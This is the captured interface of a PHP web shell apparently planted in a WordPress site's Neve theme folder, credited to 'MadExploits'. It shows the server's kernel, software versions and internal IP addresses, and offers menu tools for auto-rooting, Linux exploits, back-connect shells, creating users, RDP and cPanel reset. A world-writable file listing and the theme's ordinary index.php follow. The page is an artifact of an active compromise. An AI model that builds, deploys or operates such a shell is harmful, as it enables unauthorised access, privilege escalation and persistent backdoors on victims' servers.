Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
urlab /
wp-content /
themes /
neve /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
globals
[ DIR ]
drwxrwxrwx
header-footer-grid
[ DIR ]
drwxrwxrwx
inc
[ DIR ]
drwxrwxrwx
languages
[ DIR ]
drwxrwxrwx
page-templates
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
views
[ DIR ]
drwxrwxrwx
woocommerce
[ DIR ]
drwxrwxrwx
404.php
108
B
-rwxrwxrwx
500.php
178
B
-rwxrwxrwx
CHANGELOG.md
61.91
KB
-rwxrwxrwx
LICENSE.txt
17.67
KB
-rwxrwxrwx
archive-download.php
1.06
KB
-rwxrwxrwx
autoloader.php
4.05
KB
-rwxrwxrwx
comments.php
295
B
-rwxrwxrwx
footer-pwa.php
147
B
-rwxrwxrwx
footer.php
1.21
KB
-rwxrwxrwx
functions.php
5.04
KB
-rwxrwxrwx
header-pwa.php
680
B
-rwxrwxrwx
header.php
2.63
KB
-rwxrwxrwx
index.php
4.09
KB
-rwxrwxrwx
offline.php
178
B
-rwxrwxrwx
page.php
1.59
KB
-rwxrwxrwx
postcss.config.js
58
B
-rwxrwxrwx
readme.md
45.22
KB
-rwxrwxrwx
readme.txt
45.14
KB
-rwxrwxrwx
screenshot-mobile.png
17.77
KB
-rwxrwxrwx
screenshot.png
610.36
KB
-rwxrwxrwx
search.php
1.18
KB
-rwxrwxrwx
searchform.php
1.97
KB
-rwxrwxrwx
sidebar-shop.php
325
B
-rwxrwxrwx
sidebar.php
306
B
-rwxrwxrwx
single-download.php
1.21
KB
-rwxrwxrwx
single.php
1.17
KB
-rwxrwxrwx
start.php
2.51
KB
-rwxrwxrwx
style-main-new-rtl.css
45.92
KB
-rwxrwxrwx
style-main-new-rtl.min.css
38.82
KB
-rwxrwxrwx
style-main-new.css
45.95
KB
-rwxrwxrwx
style-main-new.min.css
38.81
KB
-rwxrwxrwx
style.css
1.52
KB
-rwxrwxrwx
taxonomy-download_category.php
1.07
KB
-rwxrwxrwx
taxonomy-download_tag.php
1.07
KB
-rwxrwxrwx
toolset-config.json
4.33
KB
-rwxrwxrwx
wpml-config.xml
1.08
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * Index template. * * @package Neve */ /** * Filters the container classes. * * @param string $classes Container classes. * * @since 1.0.0 */ $container_class = apply_filters( 'neve_container_class_filter', 'container', 'blog-archive' ); get_header(); $wrapper_classes = [ 'posts-wrapper' ]; $wrapper_classes = apply_filters( 'neve_posts_wrapper_class', $wrapper_classes ); $load_before_after_hooks = get_theme_mod( 'neve_blog_archive_layout', 'grid' ) === 'default'; ?> <div class="<?php echo esc_attr( $container_class ); ?> archive-container"> <?php /** * Executes the rendering function for the featured post. * * @since 3.2 */ do_action( 'neve_do_featured_post', 'index' ); ?> <div class="row"> <?php /** * Executes the rendering function for the sidebar. * * @param string $context Sidebar context. * @param string $position Sidebar position. * * @since 1.0.0 */ do_action( 'neve_do_sidebar', 'blog-archive', 'left' ); ?> <div class="nv-index-posts blog col"> <?php /** * Executes actions before the posts loop start. * * @since 2.4.0 */ do_action( 'neve_before_loop' ); /** * Executes the rendering function for the page header. * * @param string $context Header display page. * * @since 2.3.10 */ do_action( 'neve_page_header', 'index' ); /** * Executes actions before the post loop. * * @since 2.3.10 */ do_action( 'neve_before_posts_loop' ); if ( have_posts() ) { /* Start the Loop. */ echo '<div class="' . esc_attr( join( ' ', $wrapper_classes ) ) . '">'; $pagination_type = get_theme_mod( 'neve_pagination_type', 'number' ); if ( $pagination_type !== 'infinite' ) { global $wp_query; $posts_on_current_page = $wp_query->post_count; $hook_after_post = -1; if ( $posts_on_current_page >= 2 ) { $hook_after_post = (int) ceil( $posts_on_current_page / 2 ); } $post_index = 1; } neve_do_loop_hook( 'before' ); /** * Exclude posts from the main loop * * @param array $excluded_posts Excluded post ids. * @since 3.2 */ $excluded_posts = apply_filters( 'nv_exclude_posts', [] ); while ( have_posts() ) { the_post(); $pid = get_the_ID(); if ( in_array( $pid, $excluded_posts, true ) ) { continue; } neve_do_loop_hook( 'entry_before' ); if ( $load_before_after_hooks ) { /** * Executes actions before rendering the post content. * * @since 2.11 */ do_action( 'neve_loop_entry_before' ); } get_template_part( 'template-parts/content', get_post_type() ); if ( $load_before_after_hooks ) { /** * Executes actions after rendering the post content. * * @since 2.11 */ do_action( 'neve_loop_entry_after' ); } if ( $pagination_type !== 'infinite' && $load_before_after_hooks ) { if ( $post_index === $hook_after_post && $hook_after_post !== - 1 ) { /** * Executes actions in the middle of the loop. * * The actions only fires if the pagination is not set as "infinite scroll". * * @since 2.3.10 */ do_action( 'neve_middle_posts_loop' ); } $post_index ++; } neve_do_loop_hook( 'entry_after' ); } echo '</div>'; if ( ! is_singular() ) { /** * Executes the rendering function for the pagination. * * @param string $context Pagination location context. */ do_action( 'neve_do_pagination', 'blog-archive' ); } } else { get_template_part( 'template-parts/content', 'none' ); } ?> <div class="w-100"></div> <?php /** * Executes actions after the post loop. * * @since 2.3.10 */ do_action( 'neve_after_posts_loop' ); neve_do_loop_hook( 'after' ); ?> </div> <?php do_action( 'neve_do_sidebar', 'blog-archive', 'right' ); ?> </div> </div> <?php get_footer();
Close